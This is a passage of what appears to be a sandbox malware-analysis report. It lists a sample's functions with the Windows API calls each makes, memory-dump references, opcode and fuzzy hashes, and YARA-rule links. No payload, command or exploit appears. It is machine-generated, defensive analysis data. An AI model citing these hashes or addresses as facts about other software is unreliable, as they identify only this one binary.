                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_swprintf
                                                                                  • String ID: CMT$h%u$hc%u
                                                                                  • API String ID: 146138363-3282847064
                                                                                  • Opcode ID: 72aa42cbd020b90dae1a8e8f9befa199982faccf72176eafbd0ab9ed2c478878
                                                                                  • Instruction ID: 866b207517270cbbe77c25f54b4e29e3afb0f976512db581c81e5447cfc8821e
                                                                                  • Opcode Fuzzy Hash: 72aa42cbd020b90dae1a8e8f9befa199982faccf72176eafbd0ab9ed2c478878
                                                                                  • Instruction Fuzzy Hash: 0632E8715243859FDF18DF74C896AE93BA5AF15300F04847EFD8E8B282DB709659CB20
                                                                                  Function 0027286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00272874
                                                                                  • _strlen.LIBCMT ref: 00272E3F
                                                                                    • Part of subcall function 002802BA: __EH_prolog.LIBCMT ref: 002802BF
                                                                                    • Part of subcall function 00281B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0027BAE9,00000000,?,?,?,0001047E), ref: 00281BA0
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00272F91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                  • String ID: CMT
                                                                                  • API String ID: 1206968400-2756464174
                                                                                  • Opcode ID: 8bb478ce23fe5a7129f03d44bf49b20e73e48c35b02deb0c9c584cb1f970aa41
                                                                                  • Instruction ID: 59c9eb82080b4a5cfc42ac045a65d96879e9b95c299525f98d415781e4757a89
                                                                                  • Opcode Fuzzy Hash: 8bb478ce23fe5a7129f03d44bf49b20e73e48c35b02deb0c9c584cb1f970aa41
                                                                                  • Instruction Fuzzy Hash: 88621671520245CFDB29DF34C8867EA37A1EF55300F18847EEC9E8B282DB759969CB60
                                                                                  Function 0028F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0028F844
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0028F910
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0028F930
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0028F93A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 254469556-0
                                                                                  • Opcode ID: 46a45e3c6d2c3c747ebfc9f853f8238985d5e85dcf78567a47b21dec8123a385
                                                                                  • Instruction ID: 17b48dcdbf2c4b0414aecfc3fa5ef6dd2861e85796211f34b0e755acfefccff2
                                                                                  • Opcode Fuzzy Hash: 46a45e3c6d2c3c747ebfc9f853f8238985d5e85dcf78567a47b21dec8123a385
                                                                                  • Instruction Fuzzy Hash: 38312B75D16219DBDB50EFA4D9897CCBBB8AF08304F1040EAE50CA7290EB719B859F44
                                                                                  Function 0028E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualQuery.KERNEL32(80000000,0028E5E8,0000001C,0028E7DD,00000000,?,?,?,?,?,?,?,0028E5E8,00000004,002D1CEC,0028E86D), ref: 0028E6B4
                                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0028E5E8,00000004,002D1CEC,0028E86D), ref: 0028E6CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoQuerySystemVirtual
                                                                                  • String ID: D
                                                                                  • API String ID: 401686933-2746444292
                                                                                  • Opcode ID: e0c72a1d24b2efc56ce501ead120119537c0c1bb3b074c8082cce9ff500a6859
                                                                                  • Instruction ID: 5e4d8cb142a9e0185a72d42d5f3821451c0c70aefad6f122ea2af26b4d62ce81
                                                                                  • Opcode Fuzzy Hash: e0c72a1d24b2efc56ce501ead120119537c0c1bb3b074c8082cce9ff500a6859
                                                                                  • Instruction Fuzzy Hash: E6012B3661010A6BDF14EE29DC09BDD7BAAEFC4324F0DC120ED19D7190EA34D9158780
                                                                                  Function 00298EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00298FB5
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00298FBF
                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00298FCC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 9142b3aaee77c4a443be41d2bcabaa33a0aa1b213d5df931ea5bf75dea40868b
                                                                                  • Instruction ID: 76558b31a2cf71bc080f3fb96211d77fd0c66378bf5d9b2c6fd6bc49d856ff08
                                                                                  • Opcode Fuzzy Hash: 9142b3aaee77c4a443be41d2bcabaa33a0aa1b213d5df931ea5bf75dea40868b
                                                                                  • Instruction Fuzzy Hash: 3E31D475911219ABCB61DF24DD89B9CBBB8AF09310F5041EAE81CA7291EB309F918F44
                                                                                  Function 0029D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                  • Instruction ID: 3e03a63f3d63de57db9873845b566b2015e440ed789d99fa5b9c9300634a000d
                                                                                  • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                  • Instruction Fuzzy Hash: 8B023B71E102199FDF14CFA9C9806ADF7F5FF88314F25826AD819E7281D730AA519B90
                                                                                  Function 0028AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028AF35
                                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,002AE72C,?,?), ref: 0028AF84
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                  • String ID:
                                                                                  • API String ID: 2169056816-0
                                                                                  • Opcode ID: 578cc410d68fd2fe6a789439bb089e3264e2bf3224b9342ec0c919a5dc3c13b9
                                                                                  • Instruction ID: 58ab6aa8309f0a364de8563c67aac9bda0f45dc82edffec2840f400bee1a885f
                                                                                  • Opcode Fuzzy Hash: 578cc410d68fd2fe6a789439bb089e3264e2bf3224b9342ec0c919a5dc3c13b9
                                                                                  • Instruction Fuzzy Hash: E601217A250309ABDB50DF64ED49F9AB7BCEF09710F005422FA0597190D7709A25CBA5
                                                                                  Function 00276C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00276DDF,00000000,00000400), ref: 00276C74
                                                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00276C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: ecd755be354074e62805e657246b9035e7a56b3ea64822139094bfe5cfc5e1c8
                                                                                  • Instruction ID: 621fb4d4fd4f8ef852de053d78e71896e30e8787c898ba268258617d444ca160
                                                                                  • Opcode Fuzzy Hash: ecd755be354074e62805e657246b9035e7a56b3ea64822139094bfe5cfc5e1c8
                                                                                  • Instruction Fuzzy Hash: 90D0C931354301BFFA124F619D0EF2B7B99BF46B51F18C409B799E80E0CAB59424A629
                                                                                  Function 002A19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002A19EF,?,?,00000008,?,?,002A168F,00000000), ref: 002A1C21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  • Opcode ID: 521b35543457e19d0b98e2ab6396d5daac8e08dcf272f6d6e2ec8e2b2ef46df0
                                                                                  • Instruction ID: 7cb738760920e8d65f5fbebdaafe016dcc60ce1a3f00411e1517471eb70e7293
                                                                                  • Opcode Fuzzy Hash: 521b35543457e19d0b98e2ab6396d5daac8e08dcf272f6d6e2ec8e2b2ef46df0
                                                                                  • Instruction Fuzzy Hash: A5B17E31220609DFD715CF28C48AB657BE1FF46374F258699E89ACF2A1C735D9A1CB40
                                                                                  Function 0028F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0028F66A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 2325560087-0
                                                                                  • Opcode ID: 933baaa4683454897aceb922ab9d2a37c4c0003bf827010770b5b76c9304284d
                                                                                  • Instruction ID: 591abb2cca7f7f14c95ee9042c22de5f896319a490e8301fe9911ac7e5751916
                                                                                  • Opcode Fuzzy Hash: 933baaa4683454897aceb922ab9d2a37c4c0003bf827010770b5b76c9304284d
                                                                                  • Instruction Fuzzy Hash: 40519E75D1260A9FEB68CF94EE857AAF7F0FB48304F24842AD401EB291D3749D61CB50
                                                                                  Function 0027B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0027B16B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 6095fd6281c88676d53509da4dea9db23484c0689e800b9a36b630378532a564
                                                                                  • Instruction ID: 334a51a1f85d2a3427d2b0239d2bc8291076e8e87c48d80ab0ca310186b26023
                                                                                  • Opcode Fuzzy Hash: 6095fd6281c88676d53509da4dea9db23484c0689e800b9a36b630378532a564
                                                                                  • Instruction Fuzzy Hash: 9BF030B4D102088FDB18DF18FCA96D573F1F749315F614795DA1993390D7B0A9918E60
                                                                                  Function 002740FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: gj
                                                                                  • API String ID: 0-4203073231
                                                                                  • Opcode ID: b221975e94af8e4b1729fb41d65348e4bceea3dfcc0b338fe6c79a1939901de6
                                                                                  • Instruction ID: 2ce80fade0a8d21144c3091432225c7089ffa2f4e2efd3be73de238fa8656679
                                                                                  • Opcode Fuzzy Hash: b221975e94af8e4b1729fb41d65348e4bceea3dfcc0b338fe6c79a1939901de6
                                                                                  • Instruction Fuzzy Hash: D8C14772A183418FC354CF29D880A5AFBE1BFC9608F19892EE998D7311D734E954CB96
                                                                                  Function 0028F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0028F3A5), ref: 0028F9DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: e9ead045a0a565a9339135e66c1b0f9bfecc3c2f1f2596dae66a17fcfb97429a
                                                                                  • Instruction ID: 6e4bacf40d41783ff20c6973b4e1da7df07cde066f2d3f0e613813001522294a
                                                                                  • Opcode Fuzzy Hash: e9ead045a0a565a9339135e66c1b0f9bfecc3c2f1f2596dae66a17fcfb97429a
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 0029C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  • API String ID: 54951025-0
                                                                                  • Opcode ID: 7ffd83406ce635f18f86f356d47f8676a73d70ca52866c621b36db7912b32369
                                                                                  • Instruction ID: 2b70287f42274452f836deefc49361d0405d191fe233286ee1aee60dd106406b
                                                                                  • Opcode Fuzzy Hash: 7ffd83406ce635f18f86f356d47f8676a73d70ca52866c621b36db7912b32369
                                                                                  • Instruction Fuzzy Hash: 40A00170A02201DB9744CF35BE4D6493BA9EA66691709806AA509C5160EA24C9A4AA41
                                                                                  Function 002862CA Relevance: .8, Instructions: 829COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                  • Instruction ID: 032fe69ed25cfd9c880ba6f11877a8b99817ae173e15f74162b2529513784f1c
                                                                                  • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                  • Instruction Fuzzy Hash: 696248356257858FCB25DF28C4946B9BBE1BF95304F08C96DD8DA8B382D734E924CB11
                                                                                  Function 002877EF Relevance: .8, Instructions: 817COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                  • Instruction ID: 11808b2ca904a7316b6c9ece63ac5278361e2ce9e31593054fdf1794c020ed22
                                                                                  • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                  • Instruction Fuzzy Hash: B562487561D3858FCB18DF28C8806B9BBE1BFD5304F18896DE89A8B386D730E955CB11
                                                                                  Function 0027F461 Relevance: .7, Instructions: 694COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
